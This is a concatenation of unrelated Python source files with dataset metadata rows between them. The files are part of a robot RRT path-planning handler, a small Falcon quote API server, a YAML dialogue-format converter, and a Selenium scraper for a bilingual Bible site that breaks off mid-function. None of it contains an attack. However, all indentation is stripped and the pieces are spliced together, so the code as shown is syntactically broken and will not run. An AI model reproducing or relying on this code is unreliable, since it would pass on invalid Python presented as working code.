if self.operate_system == 2:
if self.plotting == True:
self.ax.cla()
else:
self.ax = None
else:
self.ax = None
if self.operate_system == 1 and self.plotting == True:
plt.cla()
self.plotMap(self.map)
plt.plot(pose[0],pose[1],'ko')
self.RRT_V,self.RRT_E,self.E_current_column = self.buildTree(\
[pose[0], pose[1]],pose[2],self.currentRegionPoly, self.nextRegionPoly,q_gBundle,face_normal)
"""
# map the lab coordinates back to pixels
V_tosend = array(mat(self.RRT_V[1:,:])).T
V_tosend = map(self.coordmap_lab2map, V_tosend)
V_tosend = mat(V_tosend).T
s = 'RRT:E'+"["+str(list(self.RRT_E[0]))+","+str(list(self.RRT_E[1]))+"]"+':V'+"["+str(list(self.RRT_V[0]))+","+str(list(V_tosend[0]))+","+str(list(V_tosend[1]))+"]"+':T'+"["+str(list(q_gBundle[0]))+","+str(list(q_gBundle[1]))+"]"
#print s
"""
# Run algorithm to find a velocity vector (global frame) to take the robot to the next region
self.Velocity = self.getVelocity([pose[0], pose[1]], self.RRT_V,self.RRT_E)
#self.Node = self.getNode([pose[0], pose[1]], self.RRT_V,self.RRT_E)
self.previous_next_reg = next_reg
# Pass this desired velocity on to the drive handler
self.drive_handler.setVelocity(self.Velocity[0,0], self.Velocity[1,0], pose[2])
#self.drive_handler.setVelocity(self.Node[0,0], self.Node[1,0], pose[2])
RobotPoly = Polygon.Shapes.Circle(self.radius,(pose[0],pose[1]))
# check if robot is inside the current region
departed = not self.currentRegionPoly.overlaps(RobotPoly)
arrived = self.nextRegionPoly.covers(RobotPoly)
if departed and (not arrived) and (time.time()-self.last_warning) > 0.5:
# Figure out what region we think we stumbled into
for r in self.proj.rfi.regions:
pointArray = [self.coordmap_map2lab(x) for x in r.getPoints()]
vertices = mat(pointArray).T
if is_inside([pose[0], pose[1]], vertices):
print "I think I'm in " + r.name
print pose
break
self.last_warning = time.time()
#print "arrived:"+str(arrived)
return arrived
def createRegionPolygon(self,region,hole = None):
"""
This function takes in the region points and make it a Polygon.
"""
if hole == None:
pointArray = [x for x in region.getPoints()]
else:
pointArray = [x for x in region.getPoints(hole_id = hole)]
pointArray = map(self.coordmap_map2lab, pointArray)
regionPoints = [(pt[0],pt[1]) for pt in pointArray]
formedPolygon= Polygon.Polygon(regionPoints)
return formedPolygon
def getVelocity(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
#else:
# dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- vstack((V[1,E[0,self.E_current_column]],V[2,E[0,self.E_current_column]]))
Vel = zeros([2,1])
Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Vel
def getNode(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
Node = zeros([2,1])
Node[0,0] = V[1,E[1,self.E_current_column]]
Node[1,0] = V[2,E[1,self.E_current_column]]
#Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Node
def buildTree(self,p,theta,regionPoly,nextRegionPoly,q_gBundle,face_normal, last=False):
"""
This function builds the RRT tree.
p : x,y position of the robot
theta : current orientation of the robot
regionPoly : current region polygon
nextRegionPoly : next region polygon
q_gBundle : coordinates of q_goals that the robot can reach
face_normal : the normal vector of each face corresponding to each goal point in q_gBundle
"""
q_init = mat(p).T
V = vstack((0,q_init))
theta = self.orientation_bound(theta)
V_theta = array([theta])
#!!! CONTROL SPACE: generate a list of omega for random sampling
omegaLowerBound = -math.pi/20 # upper bound for the value of omega
omegaUpperBound = math.pi/20 # lower bound for the value of omega
omegaNoOfSteps = 20
self.omega_range = linspace(omegaLowerBound,omegaUpperBound,omegaNoOfSteps)
self.omega_range_escape = linspace(omegaLowerBound*4,omegaUpperBound*4,omegaNoOfSteps*4) # range used when stuck > stuck_thres
regionPolyOld = Polygon.Polygon(regionPoly)
regionPoly += PolyShapes.Circle(self.radius*2.5,(q_init[0,0],q_init[1,0]))
# check faces of the current region for goal points
E = [[],[]] # the tree matrix
Other = [[],[]]
path = False # if path formed then = 1
stuck = 0 # count for changing the range of sampling omega
append_after_latest_node = False # append new nodes to the latest node
if self.system_print == True:
print "plotting in buildTree is " + str(self.plotting)
if self.plotting == True:
if not plt.isinteractive():
plt.ion()
plt.hold(True)
while not path:
#step -1: try connection to q_goal (generate path to goal)
i = 0
if self.system_print == True:
print "Try Connection to the goal points"
# pushing possible q_goals into the current region (ensure path is covered by the current region polygon)
q_pass = [[],[],[]]
q_pass_dist = []
q_gBundle = mat(q_gBundle)
face_normal = mat(face_normal)
while i < q_gBundle.shape[1]:
q_g_original = q_gBundle[:,i]
q_g = q_gBundle[:,i]+face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#q_g = q_gBundle[:,i]+(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
if not regionPolyOld.isInside(q_g[0],q_g[1]):
#q_g = q_gBundle[:,i]-(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
q_g = q_gBundle[:,i]-face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#forming polygon for path checking
EdgePolyGoal = PolyShapes.Circle(self.radius,(q_g[0,0],q_g[1,0])) + PolyShapes.Circle(self.radius,(V[1,shape(V)[1]-1],V[2:,shape(V)[1]-1]))
EdgePolyGoal = PolyUtils.convexHull(EdgePolyGoal)
dist = norm(q_g - V[1:,shape(V)[1]-1])
#check connection to goal
connect_goal = regionPoly.covers(EdgePolyGoal) #check coverage of path from new point to goal
# compare orientation difference
thetaPrev = V_theta[shape(V)[1]-1]
theta_orientation = abs(arctan((q_g[1,0]- V[2,shape(V)[1]-1])/(q_g[0,0]- V[1,shape(V)[1]-1])))
if q_g[1,0] > V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: # second quadrant
theta_orientation = pi - theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # first quadrant
theta_orientation = theta_orientation
elif q_g[1,0] < V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: #third quadrant
theta_orientation = pi + theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # foruth quadrant
theta_orientation = 2*pi - theta_orientation
# check the angle between vector(new goal to goal_original ) and vector( latest node to new goal)
Goal_to_GoalOriginal = q_g_original - q_g
LatestNode_to_Goal = q_g - V[1:,shape(V)[1]-1]
Angle_Goal_LatestNode= arccos(vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))/norm(Goal_to_GoalOriginal)/norm(LatestNode_to_Goal))
# if connection to goal can be established and the max change in orientation of the robot is smaller than max_angle, tree is said to be completed.
if self.orientation_print == True:
print "theta_orientation is " + str(theta_orientation)
print "thetaPrev is " + str(thetaPrev)
print "(theta_orientation - thetaPrev) is " + str(abs(theta_orientation - thetaPrev))
print "self.max_angle_allowed is " + str(self.max_angle_allowed)
print "abs(theta_orientation - thetaPrev) < self.max_angle_allowed" + str(abs(theta_orientation - thetaPrev) < self.max_angle_allowed)
print"Goal_to_GoalOriginal: " + str( array(Goal_to_GoalOriginal)) + "; LatestNode_to_Goal: " + str( array(LatestNode_to_Goal))
print vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))
print "Angle_Goal_LatestNode" + str(Angle_Goal_LatestNode)
if connect_goal and (abs(theta_orientation - thetaPrev) < self.max_angle_allowed) and (Angle_Goal_LatestNode < self.max_angle_allowed):
path = True
q_pass = hstack((q_pass,vstack((i,q_g))))
q_pass_dist = hstack((q_pass_dist,dist))
i = i + 1
if self.system_print == True:
print "checked goal points"
self.E = E
self.V = V
# connection to goal has established
# Obtain the closest goal point that path can be formed.
if path:
if shape(q_pass_dist)[0] == 1:
cols = 0
else:
(cols,) = nonzero(q_pass_dist == min(q_pass_dist))
cols = asarray(cols)[0]
q_g = q_pass[1:,cols]
"""
q_g = q_g-(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*3*self.radius #org 3
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g+(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*6*self.radius #org 3
"""
if self.plotting == True :
if self.operate_system == 1:
plt.suptitle('Rapidly-exploring Random Tree', fontsize=12)
plt.xlabel('x')
plt.ylabel('y')
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
if shape(V)[1] <= 2:
self.ax.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
self.ax.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
# trim the path connecting current node to goal point into pieces if the path is too long now
numOfPoint = floor(norm(V[1:,shape(V)[1]-1]- q_g)/self.step_size)
if numOfPoint < 3:
numOfPoint = 3
x = linspace( V[1,shape(V)[1]-1], q_g[0,0], numOfPoint )
y = linspace( V[2,shape(V)[1]-1], q_g[1,0], numOfPoint )
for i in range(x.shape[0]):
if i != 0:
V = hstack((V,vstack((shape(V)[1],x[i],y[i]))))
E = hstack((E,vstack((shape(V)[1]-2,shape(V)[1]-1))))
#push the goal point to the next region
q_g = q_g+face_normal[:,q_pass[0,cols]]*3*self.radius ##original 2*self.radius
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g-face_normal[:,q_pass[0,cols]]*6*self.radius ##original 2*self.radius
V = hstack((V,vstack((shape(V)[1],q_g[0,0],q_g[1,0]))))
E = hstack((E,vstack((shape(V)[1]-2 ,shape(V)[1]-1))))
if self.plotting == True :
if self.operate_system == 1:
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
plt.figure(1).canvas.draw()
else:
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
self.ax.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
# path is not formed, try to append points onto the tree
if not path:
# connection_to_tree : connection to the tree is successful
if append_after_latest_node:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode(V,V_theta,E,Other,regionPoly,stuck, append_after_latest_node)
else:
connection_to_tree = False
while not connection_to_tree:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode (V,V_theta,E,Other,regionPoly,stuck)
if self.finish_print:
print 'Here is the V matrix:', V, 'Here is the E matrix:',E
print >>sys.__stdout__, 'Here is the V matrix:\n', V, '\nHere is the E matrix:\n',E
#B: trim to a single path
single = 0
while single == 0:
trim = 0
for j in range(shape(V)[1]-3):
(row,col) = nonzero(E == j+1)
if len(col) == 1:
E = delete(E, col[0], 1)
trim = 1
if trim == 0:
single = 1;
####print with matlib
if self.plotting ==True :
if self.operate_system == 1:
plt.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
plt.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
plt.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
self.ax.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
self.ax.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
self.ax.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
#return V, E, and the current node number on the tree
V = array(V)
return V, E, 0
def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
"""
Generate a new node on the current tree matrix
V : the node matrix
V_theta : the orientation matrix
E : the tree matrix (or edge matrix)
Other : the matrix containing the velocity and angular velocity(omega) information
regionPoly: the polygon of current region
stuck : count on the number of times failed to generate new node
append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)
"""
if self.system_print == True:
print "In control space generating path,stuck = " + str(stuck)
connection_to_tree = False # True when connection to the tree is successful
if stuck > self.stuck_thres:
# increase the range of omega since path cannot ge generated
omega = random.choice(self.omega_range_escape)
else:
#!!!! CONTROL SPACE STEP 1 - generate random omega
omega = random.choice(self.omega_range)
#!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
if append_after_latest_node:
tree_index = shape(V)[1]-1
else:
if random.choice([1,2]) == 1:
tree_index = random.choice(array(V[0])[0])
else:
tree_index = shape(V)[1]-1
xPrev = V[1,tree_index]
yPrev = V[2,tree_index]
thetaPrev = V_theta[tree_index]
j = 1
#!!!! CONTROL SPACE STEP 3 - Check path of the robot
path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
while j <= self.timeStep:
xOrg = xPrev
yOrg = yPrev
xPrev = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
yPrev = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
thetaPrev = omega* 1 + thetaPrev
path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))
j = j + 1
thetaPrev = self.orientation_bound(thetaPrev)
path_all = PolyUtils.convexHull(path_robot)
in_bound = regionPoly.covers(path_all)
"""
# plotting
if plotting == True:
self.plotPoly(path_all,'r',1)
"""
stuck = stuck + 1
if in_bound:
robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
# check how many nodes on the tree does the new node overlaps with
nodes_overlap_count = 0
for k in range(shape(V)[1]-1):
robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
if robot_new_node.overlaps(robot_old_node):
if abs(thetaPrev - V_theta[k]) < self.max_angle_overlap:
nodes_overlap_count += 1
if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
if stuck > self.stuck_thres+1:
append_after_latest_node = False
if (stuck > self.stuck_thres+500):
stuck = 0
stuck = stuck - 20
# plotting
if self.plotting == True:
self.plotPoly(path_all,'b',1)
if self.system_print == True:
print "node connected"
V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
V_theta = hstack((V_theta,thetaPrev))
E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
Other = hstack((Other,vstack((self.velocity,omega))))
##################### E should add omega and velocity
connection_to_tree = True
append_after_latest_node = True
else:
append_after_latest_node = False
if self.system_print == True:
print "node not connected. check goal point"
else:
append_after_latest_node = False
return V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree
def orientation_bound(self,theta):
"""
make sure the returned angle is between 0 to 2*pi
"""
while theta > 2*pi or theta < 0:
if theta > 2*pi:
theta = theta - 2*pi
else:
theta = theta + 2*pi
return theta
def plotMap(self,mappedRegions):
"""
Plotting regions and obstacles with matplotlib.pyplot
number: figure number (see on top)
"""
#if not plt.isinteractive():
# plt.ion()
#plt.hold(True)
if self.operate_system == 1:
for regionName,regionPoly in mappedRegions.iteritems():
self.plotPoly(regionPoly,'k')
plt.figure(1).canvas.draw()
def plotPoly(self,c,string,w = 1):
"""
Plot polygons inside the boundary
c = polygon to be plotted with matlabplot
string = string that specify color
w = width of the line plotting
"""
if bool(c):
for i in range(len(c)):
#toPlot = Polygon.Polygon(c.contour(i))
toPlot = Polygon.Polygon(c.contour(i)) & self.all
if bool(toPlot):
for j in range(len(toPlot)):
#BoundPolyPoints = asarray(PolyUtils.pointList(toPlot.contour(j)))
BoundPolyPoints = asarray(PolyUtils.pointList(Polygon.Polygon(toPlot.contour(j))))
if self.operate_system == 2:
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
self.ax.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
else:
plt.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
plt.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
plt.figure(1).canvas.draw()
def data_gen(self):
#self.ax.cla()
for regionName,regionPoly in self.map.iteritems():
self.plotPoly(regionPoly,'k')
"""
#for i in range(len(self.V)):
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.plotPoly(self.realRobot, 'r')
self.plotPoly(self.robot, 'b')
"""
pose = self.pose_handler.getPose()
self.ax.plot(pose[0],pose[1],'bo')
"""
self.ax.plot(self.q_g[0],self.q_g[1],'ro')
self.plotPoly(self.overlap,'g')
self.plotPoly(self.m_line,'b')
"""
yield(pose[0],pose[1])
"""
self.ax.plot(self.prev_follow[0],self.prev_follow[1],'ko')
"""
def jplot(self):
ani = animation.FuncAnimation(self.fig, self.scope.update, self.data_gen)
plt.show()
class _Scope:
def __init__(self, ax, motion, maxt=2, dt=0.02):
self.i = 0
self.ax = ax
self.line, = self.ax.plot(1)
self.ax.set_ylim(0, 1)
self.motion = motion
def update(self,data):
(data1) = self.motion.data_gen()
a = data1.next()
self.line.set_data(a)
self.ax.relim()
self.ax.autoscale()
return self.line,
| gpl-3.0 | -7,881,769,386,482,705,000 | 45.484655 | 300 | 0.529798 | false |
conda/kapsel | examples/quote_api/quote.py | 1 | 4575 | from argparse import ArgumentParser
import falcon
import gunicorn.app.base
import json
import multiprocessing
import sys
# A Falcon resource that returns the same quote every time
class QuoteResource(object):
def on_get(self, req, resp):
"""Handles GET requests"""
quote = {'quote': 'I\'ve always been more interested in the future than in the past.', 'author': 'Grace Hopper'}
resp.body = json.dumps(quote)
# A Falcon resource that explains what this server is
class IndexResource(object):
def __init__(self, prefix):
self.prefix = prefix
def on_get(self, req, resp):
"""Handles GET requests"""
resp.body = """
<html>
<head>
<title>Quote API Server</title>
</head>
<body>
<p>This is a toy JSON API server example.</p>
<p>Make a GET request to <a href="%s/quote">%s/quote</a></p>
</body>
</html>
""" % (self.prefix, self.prefix)
resp.content_type = "text/html"
resp.status = falcon.HTTP_200
# A Falcon middleware to implement validation of the Host header in requests
class HostFilter(object):
def __init__(self, hosts):
# falcon strips the port out of req.host, even if it isn't 80.
# This is probably a bug in Falcon, so we work around it here.
self.hosts = [falcon.util.uri.parse_host(host)[0] for host in hosts]
def process_request(self, req, resp):
# req.host has the port stripped from what the browser
# sent us, even when it isn't 80, which is probably a bug
# in Falcon. We deal with that in __init__ by removing
# ports from self.hosts.
if req.host not in self.hosts:
print("Attempted request with Host header '%s' denied" % req.host)
raise falcon.HTTPForbidden("Bad Host header", "Cannot connect via the provided hostname")
# the gunicorn application
class QuoteApplication(gunicorn.app.base.BaseApplication):
def __init__(self, port, prefix, hosts):
assert prefix is not None
assert port is not None
self.application = falcon.API(middleware=HostFilter(hosts))
# add_route is pedantic about this
if prefix != '' and not prefix.startswith("/"):
prefix = "/" + prefix
self.application.add_route(prefix + '/quote', QuoteResource())
self.application.add_route(prefix + "/", IndexResource(prefix))
self.port = port
super(QuoteApplication, self).__init__()
print("Only connections via these hosts are allowed: " + repr(hosts))
print("Starting API server. Try http://localhost:%s%s" % (self.port, prefix + '/quote'))
def load_config(self):
# Note that --kapsel-host is NOT this address; it is NOT
# the address to listen on. --kapsel-host specifies the
# allowed values of the Host header in an http request,
# which is totally different. Another way to put it is
# that --kapsel-host is the public hostname:port browsers will
# be connecting to.
self.cfg.set('bind', '%s:%s' % ('0.0.0.0', self.port))
self.cfg.set('workers', (multiprocessing.cpu_count() * 2) + 1)
def load(self):
return self.application
# arg parser for the standard kapsel options
parser = ArgumentParser(prog="quote-api", description="API server that returns a quote.")
parser.add_argument('--kapsel-host', action='append', help='Hostname to allow in requests')
parser.add_argument('--kapsel-no-browser', action='store_true', default=False, help='Disable opening in a browser')
parser.add_argument('--kapsel-use-xheaders',
action='store_true',
default=False,
help='Trust X-headers from reverse proxy')
parser.add_argument('--kapsel-url-prefix', action='store', default='', help='Prefix in front of urls')
parser.add_argument('--kapsel-port', action='store', default='8080', help='Port to listen on')
parser.add_argument('--kapsel-iframe-hosts',
action='append',
help='Space-separated hosts which can embed us in an iframe per our Content-Security-Policy')
if __name__ == '__main__':
# This app accepts but ignores --kapsel-no-browser because we never bother to open a browser,
# and accepts but ignores --kapsel-iframe-hosts since iframing an API makes no sense.
args = parser.parse_args(sys.argv[1:])
if not args.kapsel_host:
args.kapsel_host = ['localhost:' + args.kapsel_port]
QuoteApplication(port=args.kapsel_port, prefix=args.kapsel_url_prefix, hosts=args.kapsel_host).run()
| bsd-3-clause | -1,188,982,769,034,152,700 | 41.757009 | 120 | 0.65071 | false |
parpg/parpg | tools/utilities/convert_dialogue.py | 1 | 3506 | #!/usr/bin/env python
"""Convert YAML dialogue files from the Techdemo1 format to the new Techdemo2
format.
@author: M. George Hansen <[email protected]>
"""
import os.path
import sys
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import shutil
import logging
from optparse import OptionParser
from parpg.dialogueparsers import (OldYamlDialogueParser, YamlDialogueParser,
DialogueFormatError)
def backup_file(filepath):
dirpath = os.path.dirname(filepath)
filename = os.path.basename(filepath)
shutil.copy2(filepath, os.path.join(dirpath,
'.'.join([filename, 'backup'])))
def convert_dialogue_file(filepath, backup):
logging.info('processing {0}...'.format(filepath))
dummy, extension = os.path.splitext(filepath)
if (not extension == '.yaml'):
logging.info(' skipping {0}: not a yaml file'.format(filepath))
return 1
with file(filepath, 'r') as dialogue_file:
old_parser = OldYamlDialogueParser()
new_parser = YamlDialogueParser()
try:
dialogue = old_parser.load(dialogue_file)
except DialogueFormatError as error:
logging.info(
' unable to convert {0}: unrecognized dialogue format'
.format(filepath)
)
return 1
if (backup):
backup_file(filepath)
logging.info(' backed up {0} as {0}.backup'.format(filepath))
with file(filepath, 'w') as dialogue_file:
new_parser.dump(dialogue, dialogue_file)
logging.info(' successfully converted {0}!'.format(filepath))
usage_message = '''\
usage: convert_dialogue.py [-h] [-n] [-v] [-q] file_or_dir
Convert YAML dialogue files written in Techdemo1 syntax to the new Techdemo2
syntax.
If the file_or_dir argument is a directory, then this script will attempt to
convert all .yaml files in the directory that contain valid dialogues.
By default all processed files are first backed up by adding a ".backup" suffix
to the filename + extension. Backups can be disabled by passing the -n option
to the script.
'''
def main(argv=sys.argv):
# Options.
backup = True
logging_level = logging.WARNING
parser = OptionParser(usage=usage_message,
description="Convert YAML dialogue files written "
"in Techdemo1 syntax to the new "
"Techdemo2 syntax.")
parser.add_option('-n', '--no-backup', default=True)
parser.add_option('-v', '--verbose', action='count', default=0)
parser.add_option('-q', '--quiet', action='count', default=0)
opts, args = parser.parse_args()
verbosity = opts.verbose * 10
quietness = - (opts.quiet * 10)
logging_level += (verbosity + quietness)
logging.basicConfig(format='%(message)s', level=logging_level)
try:
path = args[0]
except IndexError:
parser.print_help()
sys.exit(1)
if (os.path.isdir(path)):
for filepath in os.listdir(path):
qualified_filepath = os.path.join(path, filepath)
if (not os.path.isfile(qualified_filepath)):
continue
convert_dialogue_file(qualified_filepath, backup=backup)
else:
convert_dialogue_file(path, backup=backup)
if __name__ == '__main__':
main()
| gpl-3.0 | 1,915,518,116,129,695,200 | 34.77551 | 79 | 0.617513 | false |
hoaibang07/Webscrap | transcripture/sources/crawler_chuongthieu.py | 1 | 7017 | # -*- encoding: utf-8 -*-
import io
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
import urllib2
import urlparse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os.path
zenmatePath = "/home/hbc/.mozilla/firefox/yeyuaq0s.default/extensions/[email protected]"
ffprofile = webdriver.FirefoxProfile()
# ffprofile.set_preference("javascript.enabled", False)
# ffprofile.set_preference('permissions.default.image', 2)
# ffprofile.set_preference('permissions.default.stylesheet', 2)
# ffprofile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
ffprofile.add_extension(zenmatePath)
ffprofile.add_extension('/home/hbc/Downloads/quickjava-2.0.6-fx.xpi')
ffprofile.set_preference("thatoneguydotnet.QuickJava.curVersion", "2.0.6.1") ## Prevents loading the 'thank you for installing screen'
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Images", 2) ## Turns images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.AnimatedImage", 2) ## Turns animated images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.CSS", 2) ## CSS
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Cookies", 2) ## Cookies
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Flash", 2) ## Flash
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Java", 2) ## Java
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.JavaScript", 2) ## JavaScript
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Silverlight", 2) ## Silverlight
driver = webdriver.Firefox(ffprofile)
def _remove_div_vdx(soup):
for div in soup.find_all('div', class_='vidx'):
div.extract()
return soup
def get_data(urlchuong_list, i):
filename = 'urlsach/data/bosung/sach' + str(i) + '.txt'
ftmp = io.open(filename, 'w', encoding='utf-8')
try:
# hdrs = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Connection': 'keep-alive',
# 'Cookie': 'ipq_lip=20376774; ipq_set=1453874029; __atuvc=2%7C4; __utma=126044488.676620502.1453787537.1453787537.1453787537.1; __utmz=126044488.1453787537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ed3f4874b92a29b6ed036adfa5ad6fb3; ipcountry=us',
# 'Host': 'www.transcripture.com',
# 'Referer': 'http://www.transcripture.com/vietnamese-spanish-genesis-1.html',
# 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0'
# }
count = 1
for urlchuong in urlchuong_list:
print('Dang get chuong %d, sach %d'%(count,i))
# urlchuong = 'http://www.transcripture.com/vietnamese-chinese-revelation-3.html'
# print urlchuong
# # create request
# req = urllib2.Request(urlchuong, headers=hdrs)
# # get response
# response = urllib2.urlopen(req)
# soup = BeautifulSoup(response.read())
# Load a page
driver.get(urlchuong)
# delay = 40 # seconds
# try:
# wait = WebDriverWait(driver, delay)
# path = '/html/body/center/div[1]/div[2]/div[4]/table/tbody/tr[2]/td[1]/div/div[1]/form[1]/select/option[66]'
# elem = driver.find_element_by_xpath(path)
# wait.until(EC.visibility_of(elem))
# print "Page is ready!"
# except TimeoutException:
# print "Loading took too much time!"
# #reload page
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.ESCAPE)
# body.send_keys(Keys.F5)
content = driver.page_source
soup = BeautifulSoup(content)
soup = _remove_div_vdx(soup)
# print soup
table_tag = soup.find_all('table', attrs={'width':'100%', 'cellspacing':'0'})[0]
tr_tags = table_tag.find_all('tr')
_len = len(tr_tags)
# in first tr tag:
h2_class = tr_tags[0].find_all('h2', class_='cphd')
